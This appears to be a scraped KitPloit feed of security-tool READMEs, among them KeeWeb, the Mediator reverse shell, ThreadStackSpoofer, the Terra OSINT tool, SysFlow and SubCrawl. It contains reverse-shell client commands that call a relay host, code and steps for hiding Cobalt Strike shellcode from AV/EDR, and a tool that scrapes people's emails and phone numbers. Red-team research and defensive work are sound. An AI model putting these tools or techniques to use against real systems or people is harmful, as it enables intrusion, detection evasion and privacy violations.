πŸ”’
There are new articles available, click to refresh the page.
βœ‡ KitPloit - PenTest & Hacking Tools

Keeweb - Free Cross-Platform Password Manager Compatible With KeePass

By: Zion3R β€”

This webapp is a browser and desktop password manager compatible with KeePass databases. It doesn't require any server or additional resources. The app can run either in browser, or as a desktop app.


Quick Links

Apps: Web, Desktop
Timeline: Release Notes, TODO
On one page: Features, FAQ
Website: keeweb.info
Twitter: kee_web
Donate: OpenCollective, GitHub


Status

The app is quite stable now. Basic stuff, as well as more advanced operations, should be rather reliable.


Self-hosting

Everything you need to host this app on your server is any static file server. The app is a single HTML file + a service worker (optionally; for offline access). You can download the latest distribution files from gh-pages branch.

If you are using Docker:

  1. put your dh.pem, cert.pem, key.pem to /etc/nginx/external/
  2. run this script:
docker run --name keeweb -d -p 443:443 -p 80:80 -v $EXT_DIR:/etc/nginx/external/ antelle/keeweb

To make Dropbox work in your self-hosted app, go to this Wiki page.


Building

The easiest way to clone all KeeWeb repos is:

curl https://raw.githubusercontent.com/keeweb/keeweb/develop/dev-env.sh | bash -

The app can be built with grunt: grunt (html files will be in dist/).
Desktop apps are built with grunt desktop. This requires some magic and currently works only on CI, you can find more details in the GitHub Actions workflow.

To run the desktop (electron) app without building an installer, build the app with grunt and start it this way:

npm run dev
npm run electron

For debug build:

  1. run npm run dev
  2. open http://localhost:8085

To build desktop apps, use these goals, the result can be found in tmp:

npm run dev-desktop-macos
npm run dev-desktop-windows
npm run dev-desktop-linux

Contributing

Please read contribution guidelines for pull requests.
Here's a list of issues where your help would be very welcome. Also you can help by translating KeeWeb to your language.

Other ways of contribution can be found on this page.


Important notes for pull requests
  • please branch from develop, not master
  • don't edit translation files except base.json, they will be replaced

Donations

KeeWeb is not free to develop. It takes time, requires paid code signing certificates and domains.
You can help the project or say "thank you" with this button:

You can also sponsor the developer directly on GitHub.

Please note: donation does not imply any type of service contract.


Thank you

Notable contributions to KeeWeb:



βœ‡ KitPloit - PenTest & Hacking Tools

Mediator - An Extensible, End-To-End Encrypted Reverse Shell With A Novel Approach To Its Architecture

By: Zion3R β€”


Mediator is an end-to-end encrypted reverse shell in which the operator and the shell connect to a "mediator" server that bridges the connections. This removes the need for the operator/handler to set up port forwarding in order to listen for the connection. Mediator also allows you to create plugins to expand the functionality of the reverse shell.

You can run Mediator's scripts as standalone executables or you can import them for integration into other pentesting and incident response tools.


Architecture:

Inspired by end-to-end encrypted chat applications, Mediator takes a unique approach to the client/server model of a reverse shell. Mediator uses:

  1. A client reverse shell
  2. A client handler/operator
  3. A server that bridges the two connections

Reverse shells and handlers connect to the Mediator server with a connection key. The server listens on port 80 for handler connections and port 443 for reverse shell connections. When clients connect to the mediator, the server queues the clients according to their respective type and connection key. When both a reverse shell and an operator connect to the server with the same key, the server will bridge the two connections. From there, a key exchange is done between the two clients, and all communication between the reverse shell and operator is encrypted end-to-end. This ensures the server cannot snoop on the streams it is piping.


Plugins

Plugins allow you to add extra commands that can execute code on the operator's host, the target host, or both! Please refer to the README in the plugins directory for more information about plugins.


Instructions:

Server

The client scripts can be run on Windows or Linux, but you'll need to stand up the server (mediator.py) on a Linux host. The server is pure Python, so no dependencies need to be installed. You can either run the server script with

$ python3 mediator.py

or you can build a Docker image with the provided Dockerfile and run it in a container (make sure to publish ports 80 and 443).


Clients

You will need to install the dependencies found in requirements.txt) for the clients to work. You can do this with the following command:

$ pip3 install -r requirements.txt

See Tips and Reminders at the bottom for help on distributing the clients without worrying about dependencies.

The handler and the reverse shell can be used within other Python scripts or directly via the command line. In both cases, the clients can accept arguments for the server address and connection key. Usage of those arguments is described below.

Mediator server address

For Python script usage, the address of the mediator host is required upon instantiation:

Handler class

from handler import Handler

operator = Handler(mediatorHost="example.com")
operator.run()

WindowsRShell class

from windowsTarget import WindowsRShell

shell = WindowsRShell(mediatorHost="example.com")
shell.run()

If executing a client script directly from a shell, you can either hard code the address at the bottom of the script, or the server address can be specified as an argument with the -s or --server flag:

handler.py

$ python3 handler.py -s example.com

windowsTarget.py

> python windowsTarget.py -s example.com

Connection key

When two handlers or two reverse shells connect to the mediator server with the same connection key, only the first connection is queued awaiting its match. Until the queued connection either times out (30 seconds) or matches with a counterpart connection, all other clients of the same type trying to connect with the same connection key will be dropped.

It is important to make sure each handler is using a unique connection key to avoid a race condition resulting in the wrong shell being given to an operator.

Only keys with the prefix "#!ConnectionKey_" will be accepted by the server. The default connection key is "#!ConnectionKey_CHANGE_ME!!!".

To change the connection key for Python script usage, the connection key can optionally be supplied upon instantiation:

Handler class

from handler import Handler

operator = Handler(mediatorHost="example.com", connectionKey="#!ConnectionKey_secret_key")
operator.run()

LinuxRShell class

from linuxTarget import LinuxRShell

shell = LinuxRShell(mediatorHost="example.com", connectionKey="#!ConnectionKey_secret_key")
shell.run()

If executing a client script directly from a shell, you can either hard code the connection key at the bottom of the script, or the connection key can be specified as an argument with the -c or --connection-key flag:

handler.py

$ python3 handler.py -s example.com -c '#!ConnectionKey_secret_key'

windowsTarget.py

> python windowsTarget.py -s example.com -c '#!ConnectionKey_secret_key'

Tips and Reminders:
  • REMINDER: handlers and reverse shells will not be bridged together unless they connect to the mediator server using the same connection key within 30 seconds of each other.
  • TIP: You can easily create an exe for windowsTarget.py with pyinstaller using the --onefile flag
  • TIP: For security, you should use a randomly generated connection key for each session. If a malicious party learns your connection key and spams the operator port with it, your operator client will be unable to connect due to the server not allowing duplicate connnections, and they will be connected to your target's shell.


βœ‡ KitPloit - PenTest & Hacking Tools

Webdiscover - The Purpose Of This Script Is To Automate The Web Enumeration Process And Search For Exploits

By: Zion3R β€”


The purpose of this script is to automate the web enumeration process and search for exploits and vulns.

Added Tools (dependencies are installed during script execution):

  • seclist
  • ffuf
  • namelist
  • dnsrecon
  • subfinder
  • whatweb
  • gospider
  • nuclei
  • searchsploit
  • go-exploitdb

It creates a directory with the scan outputs, as shown in the example below.


Usage

Prerequisites

  • Docker service installed

If you want to build the container yourself manually, git clone the repo:

git clone [email protected]:V1n1v131r4/webdiscover.git

Then build your docker container

docker build -t webdiscover .

After building the container, run the following:

docker run --rm -it -v /path/to/local/directory:/webdiscoverData webdiscover


βœ‡ KitPloit - PenTest & Hacking Tools

VECTR - A Tool That Facilitates Tracking Of Your Red And Blue Team Testing Activities To Measure Detection And Prevention Capabilities Across Different Attack Scenarios

By: Zion3R β€”


VECTR documentation can be found here: https://docs.vectr.io

VECTR Community Discord Channel: https://discord.gg/2FRd8zf728

VECTR is a tool that facilitates tracking of your red and blue team testing activities to measure detection and prevention capabilities across different attack scenarios. VECTR provides the ability to create assessment groups, which consist of a collection of Campaigns and supporting Test Cases to simulate adversary threats. Campaigns can be broad and span activity across the kill chain, from initial compromise to privilege escalation and lateral movement and so on, or can be a narrow in scope to focus on specific detection layers, tools, and infrastructure. VECTR is designed to promote full transparency between offense and defense, encourage training between team members, and improve detection & prevention success rate across the environment.


VECTR is focused on common indicators of attack and behaviors that may be carried out by any number of threat actor groups, with varying objectives and levels of sophistication. VECTR can also be used to replicate the step-by-step TTPs associated with specific groups and malware campaigns, however its primary purpose is to replicate attacker behaviors that span multiple threat actor groups and malware campaigns, past, present and future. VECTR is meant to be used over time with targeted campaigns, iteration, and measurable enhancements to both red team skills and blue team detection capabilities. Ultimately the goal of VECTR is to make a network resilient to all but the most sophisticated adversaries and insider attacks.







Documentation

Feature Breakdowns By Release

VECTR v7.1.1 Feature Breakdown


Team

LEAD PROGRAMMERS:

  • Carl Vonderheid
  • Galen Fisher
  • Daniel Hong

PROGRAMMERS:

  • Andrew Scott
  • Patrick Hislop
  • Dan Guzek
  • Zara Gunner
  • Nick Galante

DESIGN & REQUIREMENTS:

  • Phil Wainwright

DEV OPS:

  • Paul Spencer

GRAPHIC DESIGN & MARKETING:

  • Doug Webster

License

Please see the EULA

Atomic Red LICENSE



βœ‡ KitPloit - PenTest & Hacking Tools

ThreadStackSpoofer - PoC For An Advanced In-Memory Evasion Technique Allowing To Better Hide Injected Shellcode'S Memory Allocation From Scanners And Analysts

By: Zion3R β€”


A PoC implementation for an advanced in-memory evasion technique that spoofs Thread Call Stack. This technique allows to bypass thread-based memory examination rules and better hide shellcodes while in-process memory.


Intro

This is an example implementation for Thread Stack Spoofing technique aiming to evade Malware Analysts, AVs and EDRs looking for references to shellcode's frames in an examined thread's call stack. The idea is to hide references to the shellcode on thread's call stack thus masquerading allocations containing malware's code.

Implementation along with my ShellcodeFluctuation brings Offensive Security community sample implementations to catch up on the offering made by commercial C2 products, so that we can do no worse in our Red Team toolings.


Implementation has changed

Current implementation differs heavily to what was originally published. This is because I realised there is a way simpler approach to terminate thread's call stack processal and hide shellcode's related frames by simply writing 0 to the return address of the first frame we control:


void WINAPI MySleep(DWORD _dwMilliseconds)
{
[...]
auto overwrite = (PULONG_PTR)_AddressOfReturnAddress();
const auto origReturnAddress = *overwrite;
*overwrite = 0;

[...]
*overwrite = origReturnAddress;
}

The previous implementation, utilising StackWalk64 can be accessed in this commit c250724.

This implementation is much more stable and works nicely on both Debug and Release under two architectures - x64 and x86.


Demo

This is how a call stack may look like when it is NOT spoofed:


Β 

This in turn, when thread stack spoofing is enabled:


Β 

Above we can see that the last frame on our call stack is our MySleep callback. One can wonder does it immediately brings opportunities new IOCs? Hunting rules can look for threads having call stacks not unwinding into following expected thread entry points located within system libraries:

kernel32!BaseThreadInitThunk+0x14
ntdll!RtlUserThreadStart+0x21

However the call stack of the spoofed thread may look rather odd at first, a brief examination of my system shown, that there are other threads not unwinding to the above entry points as well:



The above screenshot shows a thread of unmodified Total Commander x64. As we can see, its call stack pretty much resembles our own in terms of initial call stack frames.

Why should we care about carefully faking our call stack when there are processes exhibiting traits that we can simply mimic?


How it works?

The rough algorithm is following:

  1. Read shellcode's contents from file.
  2. Acquire all the necessary function pointers from dbghelp.dll, call SymInitialize
  3. Hook kernel32!Sleep pointing back to our callback.
  4. Inject and launch shellcode via VirtualAlloc + memcpy + CreateThread. The thread should start from our runShellcode function to avoid having Thread's StartAddress point into somewhere unexpected and anomalous (such as ntdll!RtlUserThreadStart+0x21)
  5. As soon as Beacon attempts to sleep, our MySleep callback gets invoked.
  6. We then overwrite last return address on the stack to 0 which effectively should finish the call stack.
  7. Finally a call to ::SleepEx is made to let the Beacon's sleep while waiting for further communication.
  8. After Sleep is finished, we restore previously saved original function return addresses and execution is resumed.

Function return addresses are scattered all around the thread's stack memory area, pointed to by RBP/EBP register. In order to find them on the stack, we need to firstly collect frame pointers, then dereference them for overwriting:



(the above image was borrowed from Eli Bendersky's post named Stack frame layout on x86-64)

	*(PULONG_PTR)(frameAddr + sizeof(void*)) = Fake_Return_Address;

Initial implementation of ThreadStackSpoofer did that in walkCallStack and spoofCallStack functions, however the current implementation shows that these efforts are not required to maintain stealthy call stack.


Example run

Use case:

C:\> ThreadStackSpoofer.exe <shellcode> <spoof>

Where:

  • <shellcode> is a path to the shellcode file
  • <spoof> when 1 or true will enable thread stack spoofing and anything else disables it.

Example run that spoofs beacon's thread call stack:

PS D:\dev2\ThreadStackSpoofer> .\x64\Release\ThreadStackSpoofer.exe .\tests\beacon64.bin 1
[.] Reading shellcode bytes...
[.] Hooking kernel32!Sleep...
[.] Injecting shellcode...
[+] Shellcode is now running.
[>] Original return address: 0x1926747bd51. Finishing call stack...

===> MySleep(5000)

[<] Restoring original return address...
[>] Original return address: 0x1926747bd51. Finishing call stack...

===> MySleep(5000)

[<] Restoring original return address...
[>] Original return address: 0x1926747bd51. Finishing call stack...


How do I use it?

Look at the code and its implementation, understand the concept and re-implement the concept within your own Shellcode Loaders that you utilise to deliver your Red Team engagements. This is an yet another technique for advanced in-memory evasion that increases your Teams' chances for not getting caught by Anti-Viruses, EDRs and Malware Analysts taking look at your implants.

While developing your advanced shellcode loader, you might also want to implement:

  • Process Heap Encryption - take an inspiration from this blog post: Hook Heaps and Live Free - which can let you evade Beacon configuration extractors like BeaconEye
  • Change your Beacon's memory pages protection to RW (from RX/RWX) and encrypt their contents - using Shellcode Fluctuation technique - right before sleeping (that could evade scanners such as Moneta or pe-sieve)
  • Clear out any leftovers from Reflective Loader to avoid in-memory signatured detections
  • Unhook everything you might have hooked (such as AMSI, ETW, WLDP) before sleeping and then re-hook afterwards.


Actually this is not (yet) a true stack spoofing

As it's been pointed out to me, the technique here is not yet truly holding up to its name for being a stack spoofer. Since we're merely overwriting return addresses on the thread's stack, we're not spoofing the remaining areas of the stack itself. Moreover we're leaving our call stack unwindable meaking it look anomalous since the system will not be able to properly walk the entire call stack frames chain.

However I'm aware of these shortcomings, at the moment I've left it as is since I cared mostly about evading automated scanners that could iterate over processes, enumerate their threads, walk those threads stacks and pick up on any return address pointing back to a non-image memory (such as SEC_PRIVATE - the one allocated dynamically by VirtuaAlloc and friends). A focused malware analyst would immediately spot the oddity and consider the thread rather unusual, hunting down our implant. More than sure about it. Yet, I don't believe that nowadays automated scanners such as AV/EDR have sorts of heuristics implemented that would actually walk each thread's stack to verify whether its un-windable Β―\_(ツ)_/Β― .

Surely this project (and commercial implementation found in C2 frameworks) gives AV & EDR vendors arguments to consider implementing appropriate heuristics covering such a novel evasion technique.

In order to improve this technique, one can aim for a true Thread Stack Spoofer by inserting carefully crafted fake stack frames established in an reverse-unwinding process. Read more on this idea below.


Implementing a true Thread Stack Spoofer

Hours-long conversation with namazso teached me, that in order to aim for a proper thread stack spoofer we would need to reverse x64 call stack unwinding process. Firstly, one needs to carefully acknowledge the stack unwinding process explained in (a) linked below. The system when traverses Thread call stack on x64 architecture will not simply rely on return addresses scattered around the thread's stack, but rather it:

  1. takes return address
  2. attempts to identify function containing that address (with RtlLookupFunctionEntry)
  3. That function returns RUNTIME_FUNCTION, UNWIND_INFO and UNWIND_CODE structures. These structures describe where are the function's beginning address, ending address, and where are all the code sequences that modify RBP or RSP.
  4. System needs to know about all stack & frame pointers modifications that happened in each function across the Call Stack to then virtually rollback these changes and virtually restore call stack pointers when a call to the processed call stack frame happened (this is implemented in RtlVirtualUnwind)
  5. The system processes all UNWIND_CODEs that examined function exhbits to precisely compute the location of that frame's return address and stack pointer value.
  6. Through this emulation, the System is able to walk down the call stacks chain and effectively "unwind" the call stack.

In order to interfere with this process we wuold need to revert it by having our reverted form of RtlVirtualUnwind. We would need to iterate over functions defined in a module (let's be it kernel32), scan each function's UNWIND_CODE codes and closely emulate it backwards (as compared to RtlVirtualUnwind and precisely RtlpUnwindPrologue) in order to find locations on the stack, where to put our fake return addresses.

namazso mentions the necessity to introduce 3 fake stack frames to nicely stitch the call stack:

  1. A "desync" frame (consider it as a gadget-frame) that unwinds differently compared to the caller of our MySleep (having differnt UWOP - Unwind Operation code). We do this by looking through all functions from a module, looking through their UWOPs, calculating how big the fake frame should be. This frame must have UWOPS different than our MySleep's caller.
  2. Next frame that we want to find is a function that unwindws by popping into RBP from the stack - basically through UWOP_PUSH_NONVOL code.
  3. Third frame we need a function that restores RSP from RBP through the code UWOP_SET_FPREG

The restored RSP must be set with the RSP taken from wherever control flow entered into our MySleep so that all our frames become hidden, as a result of third gadget unwinding there.

In order to begin the process, one can iterate over executable's .pdata by dereferencing IMAGE_DIRECTORY_ENTRY_EXCEPTION data directory entry. Consider below example:

    ULONG_PTR imageBase = (ULONG_PTR)GetModuleHandleA("kernel32");
PIMAGE_NT_HEADERS64 pNthdrs = PIMAGE_NT_HEADERS64(imageBase + PIMAGE_DOS_HEADER(imageBase)->e_lfanew);

auto excdir = pNthdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXCEPTION];
if (excdir.Size == 0 || excdir.VirtualAddress == 0)
return;

auto begin = PRUNTIME_FUNCTION(excdir.VirtualAddress + imageBase);
auto end = PRUNTIME_FUNCTION(excdir.VirtualAddress + imageBase + excdir.Size);

UNWIND_HISTORY_TABLE mshist = { 0 };
DWORD64 imageBase2 = 0;

PRUNTIME_FUNCTION currFrame = RtlLookupFunctionEntry(
(DWORD64)caller,
&imageBase2,
&mshist
);

UNWIND_INFO *mySleep = (UNWIND_INFO*)(currFrame->UnwindData + imageBase);
UNWIND_CODE myFrameUwop = (UNWIND_CODE)(mySleep->UnwindCodes[0]);

log("1. MySleep RIP UWOP: ", myFrameUwop.UnwindOpcode);

for (PRUNTIME_FUNCTION it = begin; it < end; ++it)
{
UNWIND_INFO* unwindData = (UNWIND_INFO*)(it->UnwindData + imageBase);
UNWIND_CODE frameUwop = (UNWIND_CODE)(unwindData->UnwindCodes[0]);

if (frameUwop.UnwindOpcode != myFrameUwop.UnwindOpcode)
{
// Found candidate function for a desynch gadget frame

}
}

The process is a bit convoluted, yet boils down to reverting thread's call stack unwinding process by substituting arbitrary stack frames with carefully selected other ones, in a ROP alike approach.

This PoC does not follows replicate this algorithm, because my current understanding allows me to accept the call stack finishing on an EXE-based stack frame and I don't want to overcompliate neither my shellcode loaders nor this PoC. Leaving the exercise of implementing this and sharing publicly to a keen reader. Or maybe I'll sit and have a try on doing this myself given some more spare time :)

More information:



Word of caution

If you plan on adding this functionality to your own shellcode loaders / toolings be sure to AVOID unhooking kernel32.dll. An attempt to unhook kernel32 will restore original Sleep functionality preventing our callback from being called. If our callback is not called, the thread will be unable to spoof its own call stack by itself.

If that's what you want to have, than you might need to run another, watchdog thread, making sure that the Beacons thread will get spoofed whenever it sleeps.

If you're using Cobalt Strike and a BOF unhook-bof by Raphael's Mudge, be sure to check out my Pull Request that adds optional parameter to the BOF specifying libraries that should not be unhooked.

This way you can maintain your hooks in kernel32:

beacon> unhook kernel32
[*] Running unhook.
Will skip these modules: wmp.dll, kernel32.dll
[+] host called home, sent: 9475 bytes
[+] received output:
ntdll.dll <.text>
Unhook is done.

Modified unhook-bof with option to ignore specified modules



Final remark

This PoC was designed to work with Cobalt Strike's Beacon shellcodes. The Beacon is known to call out to kernel32!Sleep to await further instructions from its C2. This loader leverages that fact by hooking Sleep in order to perform its housekeeping.

This implementation might not work with other shellcodes in the market (such as Meterpreter) if they don't use Sleep to cool down. Since this is merely a Proof of Concept showing the technique, I don't intend on adding support for any other C2 framework.

When you understand the concept, surely you'll be able to translate it into your shellcode requirements and adapt the solution for your advantage.

Please do not open Github issues related to "this code doesn't work with XYZ shellcode", they'll be closed immediately.



Show Support

This and other projects are outcome of sleepless nights and plenty of hard work. If you like what I do and appreciate that I always give back to the community, Consider buying me a coffee (or better a beer) just to say thank you!



Author
   Mariusz Banach / mgeeky, 21
<mb [at] binary-offensive.com>
(https://github.com/mgeeky)


βœ‡ KitPloit - PenTest & Hacking Tools

Terra - OSINT Tool On Twitter And Instagram

By: Zion3R β€”


OSINT Tool On Twitter And Instagram.


Installation

Clone the github repo

$ git clone https://github.com/xadhrit/terra.git

Change Directory

$ cd terra

Requirements :

For requirements run following commands:

$ python3 -m pip install -r requirements.txt

Note

For Twitter Credentials :

You need credentials which are listed in twitter.yml file in creds folder for using terra.

You can find more about Twitter Api and Access Tokens on Twitter's Developer Portal

For Instagram Credentails:

Put your Instagram's username and password in creds/insta.yml file. And you are good to go.


Usage :


Β 

Basic Usage:

~/terra$ python3 terra.py <username of target> 

help : -j for saving results in a JSON file
-f for text file


Twitter Recon Commands :
ls: Display all Terra Commands

help: For Help

quit: For quiting the program

clear: For cleaning your terminal screen

exit: For exiting from Terra

reset target : Reset new target in command line

tweets : Get latest tweets tweeted by Target

favtweets : Get latest tweets which favorited by Target

followers : Get target's followers list

following : Get target's following list

info: Get overview and infomation about target

profile pic: Download Target's Profile Picture

banner: Download Target's Profile banner

htags : Get hashtags used by Target


Instgram Recon Commands :
gathering target's captions, reset target: For resetting target in Terra, comments : For all comments of target, followers : For getting follower's list of target, followings: For getting following list of target followers emails : For target's followers emails, following emails : For target's following emails, followers phone : For target followers phone numbers, followings phone : For target followings phone numbers, tags : For getting hashtags used by target , timeline : For overview of target's account , likes: Get total_likes of target, ' mediatype : For information of photos and video of target, photodes : For gathering target photos description, ' photos : For Downloading target's photos, profile pic : For downloading target's profile picture, stories : For downloading target's stories , tagged': For listing user who tagged by target, commenter': For getting all user who commented on target's posts ttag : For listing user tagged target in their posts ">
ls  : Display Terra Commands,

help : for Help,

clear: for clearning your Screen,

quit: for quiting,

exit: For Exiting from Terra,

locations : For getting Pinned location of target,

captions : For gathering target's captions,

reset target: For resetting target in Terra,

comments : For all comments of target,

followers : For getting follower's list of target,

followings: For getting following list of target

followers emails : For target's followers emails,

following emails : For target's following emails,

followers phone : For target followers phone numbers,

followings phone : For target followings phone numbers,

tags : For getting hashtags used by target ,

timeline : For overview of target's account ,

likes: Get total_likes of target,
'
mediatype : For information of photos and video of target,

photodes : For gathering target photos description,
'
photos : For Downloading target's photos,

profile pic : For downloading target's profile picture,

stories : For downloading target's stories ,

tagged': For listing user who tagged by target,

commenter': For getting all user who commented on target's posts

ttag : For listing user tagged target in their posts


Contribution :

Every pull request with good and understandable code :) is welcomed.


TourbleShooting

Open an issue on Github.

Every time you relogin in instagram account you have to delete session ids and cookies and from creds/settings.json file and put an empty braces in file like this


External Libraries :

Python-twitter : https://github.com/bear/python-twitter

Instagram Private API : https://github.com/ping/instagram_private_api

Terra is no longer an active project. I am looking for maintainers.



βœ‡ KitPloit - PenTest & Hacking Tools

SysFlow - Cloud-native System Telemetry Pipeline

By: Zion3R β€”


This repository hosts the documentation and issue tracker for all SysFlow projects.


Quick reference

What is SysFlow?

The SysFlow Telemetry Pipeline is a framework for monitoring cloud workloads and for creating performance and security analytics. The goal of this project is to build all the plumbing required for system telemetry so that users can focus on writing and sharing analytics on a scalable, common open-source platform. The backbone of the telemetry pipeline is a new data format called SysFlow, which lifts raw system event information into an abstraction that describes process behaviors, and their relationships with containers, files, and network. This object-relational format is highly compact, yet it provides broad visibility into container clouds. We have also built several APIs that allow users to process SysFlow with their favorite toolkits. Learn more about SysFlow in the SysFlow specification document.

The SysFlow framework consists of the following sub-projects:

  • sf-apis provides the SysFlow schema and programatic APIs in go, python, and C++.
  • sf-collector monitors and collects system call and event information from hosts and exports them in the SysFlow format using Apache Avro object serialization.
  • sf-processor provides a performance optimized policy engine for processing, enriching, filtering SysFlow events, generating alerts, and exporting the processed data to various targets.
  • sf-exporter exports SysFlow traces to S3-compliant storage systems for archival purposes.
  • sf-deployments contains deployment packages for SysFlow, including Docker, Helm, and OpenShift.
  • sysflow is the documentation repository and issue tracker for the SysFlow framework.

Online documentation

SysFlow documentation is available at sysflow.readthedocs.io.


Offline build

This documentation depends on Sphinx (http://www.sphinx-doc.org/en/master/), which must be installed to do builds. The project also requires the following Sphinx plugins:

To build the site as HTML go to the base directory and type:

make html


βœ‡ KitPloit - PenTest & Hacking Tools

SubCrawl - A Modular Framework For Discovering Open Directories, Identifying Unique Content Through Signatures And Organizing The Data With Optional Output Modules, Such As MISP

By: Zion3R β€”


SubCrawl is a framework developed by Patrick SchlΓ€pfer, Josh Stroschein and Alex Holland of HP Inc’s Threat Research team. SubCrawl is designed to find, scan and analyze open directories. The framework is modular, consisting of four components: input modules, processing modules, output modules and the core crawling engine. URLs are the primary input values, which the framework parses and adds to a queuing system before crawling them. The parsing of the URLs is an important first step, as this takes a submitted URL and generates additional URLs to be crawled by removing sub-directories, one at a time until none remain. This process ensures a more complete scan attempt of a web server and can lead to the discovery of additional content. Notably, SubCrawl does not use a brute-force method for discovering URLs. All the content scanned comes from the input URLs, the process of parsing the URL and discovery during crawling. When an open directory is discovered, the crawling engine extracts links from the directory for evaluation. The crawling engine determines if the link is another directory or if it is a file. Directories are added to the crawling queue, while files undergo additional analysis by the processing modules. Results are generated and stored for each scanned URL, such as the SHA256 and fuzzy hashes of the content, if an open directory was found, or matches against YARA rules. Finally, the result data is processed according to one or more output modules, of which there are currently three. The first provides integration with MISP, the second simply prints the data to the console, and the third stores the data in an SQLite database. Since the framework is modular, it is not only easy to configure which input, processing and output modules are desired, but also straightforward to develop new modules.


Figure 1 - SubCrawl architecture

SubCrawl supports two different modes of operation. First, SubCrawl can be started in a run-once mode. In this mode, the user supplies the URLs to be scanned in a file where each input value is separated by a line break. The second mode of operation is service mode. In this mode, SubCrawl runs in the background and relies on the input modules to supply the URLs to be scanned. Figure 1 shows an overview of SubCrawl’s architecture. The components that are used in both modes of operation are blue, run-once mode components are yellow, and service mode components are green.


Requirements

Based on the chosen run mode, other preconditions must be met.


Run-Once Mode Requirements

SubCrawl is written in Python3. In addition, there are several packages that are required before running SubCrawl. The following command can be used to install all required packages before running SubCrawl. From the crawler directory, run the following command:

$ sudo apt install build-essential
$ pip3 install -r requirements.txt

Service Mode Requirements

If SubCrawl is started in service mode, this can be done using Docker. For this reason, the installation of Docker and Docker Compose is required. Good installation instructions for this can be found directly on the Docker.com website.


Getting Help

SubCrawl has built-in help through the -h/--help argument or by simply executing the script without any arguments.

  ********         **        ******                               **
**////// /** **////** /**
/** ** **/** ** // ****** ****** *** ** /**
/*********/** /**/****** /** //**//* //////** //** * /** /**
////////**/** /**/**///**/** /** / ******* /** ***/** /**
/**/** /**/** /**//** ** /** **////** /****/**** /**
******** //******/****** //****** /*** //******** ***/ ///** ***
//////// ////// ///// ////// /// //////// /// /// ///
~~ Harvesting the Open Web ~~

usage: subcrawl.py [-h] [-f FILE_PATH] [-k] [-p PROCESSING_MODULES] [-s STORAGE_MODULES]

optional arguments:
-h, --help show this help message and exit
-f FILE_PATH, --file FILE_PATH
Path of input URL file
-k, --kafka Use Kafka Queue as input
-p PROCESSING_MODULES, --processing PROCESSING_MODULES
Processing modules to be executed comma separated.
-s STORAGE_MODULES, --storage STORAGE_MODULES
Storage modules to be executed comma separated.

Available processing modules:
- ClamAVProcessing
- JARMProcessing
- PayloadProcessing
- TLSHProcessing
- YARAProcessing

Available storage modules:
- ConsoleStorage
- MISPStorage
- SqliteStorage

Run-Once Mode

This mode is suitable if you want to quickly scan a manageable amount of domains. For this purpose, the URLs to be scanned must be saved in a file, which then serves as input for the crawler. The following is an example of executing in run-once mode, not the -f argument is used with a path to a file.

python3 subcrawl.py -f urls.txt -p YARAProcessing,PayloadProcessing -s ConsoleStorage

Service Mode

With the service mode, a larger amount of domains can be scanned and the results saved. Based on the selected storage module, the data can then be analyzed and evaluated in more detail. To make running the service mode as easy as possible for the user, we built all the functionalities into a Docker image. In service mode, the domains to be scanned are obtained via Input modules. By default, new malware and phishing URLs are downloaded from URLhaus and PhishTank and queued for scanning. The desired processing and storage modules can be entered directly in the config.yml. By default, the following processing modules are activated, utilizing the SQLite storage:

  • ClamAVProcessing
  • JARMProcessing
  • TLSHProcessing
  • YARAProcessing

In addition to the SQLite storage module, a simple web UI was developed that allows viewing and managing the scanned domains and URLs.


Β 

However, if this UI is not sufficient for the subsequent evaluation of the data, the MISP storage module can be activated alternatively or additionally. The corresponding settings must be made in config.yml under the MISP section.

The following two commands are enough to clone the GIT repository, create the Docker container and start it directly. Afterwards the web UI can be reached at the address https://localhost:8000/. Please note, once the containers have started the input modules will begin to add URLs to the processing queue and the engine will begin crawling hosts.

git clone https://github.com/hpthreatresearch/subcrawl.git

docker-compose up --build

SubCrawl Modules

Input Modules

Input modules are only used in service mode. If SubCrawl started using the run-once mode then a file containing the URLs to scan must be supplied. The following two input modules have been implemented.


URLhaus

URLhaus is a prominent web service tracking malicious URLs. The web service also provides exports containing new detected URLs. Those malware URLs serve as perfect input to our crawler as we mainly want to analyze malicious domains. Recently submitted URLS are retrieved and search results are not refined through the API request (i.e. through tags or other parameters available). The HTTP request made in this input module to the URLHaus API can be modifed to further refine the results obtained.


PhishTank

PhishTank is a website that collects phishing URLs. Users have the possibility to submit new found phishing pages. An export with active phishing URLs can be generated and downloaded from this web service via API. So this is also an ideal collection for our crawler.


Processing Modules

SubCrawl comes with several processing modules. The processing modules all follow similar behavior on how they provide results back to the core engine. If matches are found, results are returned to the core engine and later provided to the storage modules. Below is a list of processing modules.


SDHash

The SDHash processing modue is used to calculate a similarity hash of the HTTP response. The minimum size of the content must is 512 bytes to be able to successfully calculate a hash. This is probably the most complicated processing module to install, as it requires Protobuf and depending on the target host it must be recompiled. Therefore this processing module is deactivated by default. An already compiled version can be found in crawler/processing/minisdhash/ which requires protobuf-2.5.0 and python3.6. Those binaries were compiled on an Ubuntu 18.04.5 LTS x64. Following the installation instructions:

# Protobuf installation
> apt-get update
> apt-get -y install libssl-dev libevent-pthreads-2.1-6 libomp-dev g++
> apt-get -y install autoconf automake libtool curl make g++ unzip
> wget https://github.com/protocolbuffers/protobuf/releases/download/v2.5.0/protobuf-2.5.0.zip
> unzip protobuf-2.5.0.zip
> cd protobuf-2.5.0
> ./configure
> make
> sudo make install

# Python3.6 installation
> apt-get install python3.6-dev
> sudo ldconfig

# SDHash installation
> git clone https://github.com/sdhash/sdhash.git
> cd sdhash
> make
> make install
> ldconfig

JARM

JARM is a tool that fingerprints TLS connections developed by Salesforce. The JARM processing module performs a scan of the domain and returns a JARM hash with the domain to the core engine. Depending on the configuration of a web server, the TLS handshake has different properties. By calculating a hash of the attributes of this handshake, these differences can be used to track web server configurations.


TLSH

The TLSH processing module is similar to the SDHash processing module used to calculate a similarity hash. The advantage of the TLSH is, that the installation is much simpler and the input minium is smaller with 50 bytes. As most webshell logins are rather small and were the focus of our research, we activated this processing module by default.


YARA

The YARA processing module is used to scan HTTP response content with YARA rules. To invoke this processing module, provide the value YARAProcessing as a processing module argument. For example, the following command will load the YARA processing module and produce output to the console via the ConsoleStorage storage module.

python3 subcrawl.py -p YARAProcessing -s ConsoleStorage

Currently, the YARA processing module is used to identify webshell logins and various other interesting content. YARA rules included with this project:

  • protected_webshell: Identifies login pages of password-protected webshells
  • js_webshell_tracking_script: Identifies backdoored plugins/themes that use JavaScript to notifies the attacker when the webshell becomes active
  • open_webshell: Identifies open webshells (i.e. webshells that are not protected via login)
  • php_webshell_backend: Identifies PHP webshell backend used by the attacker

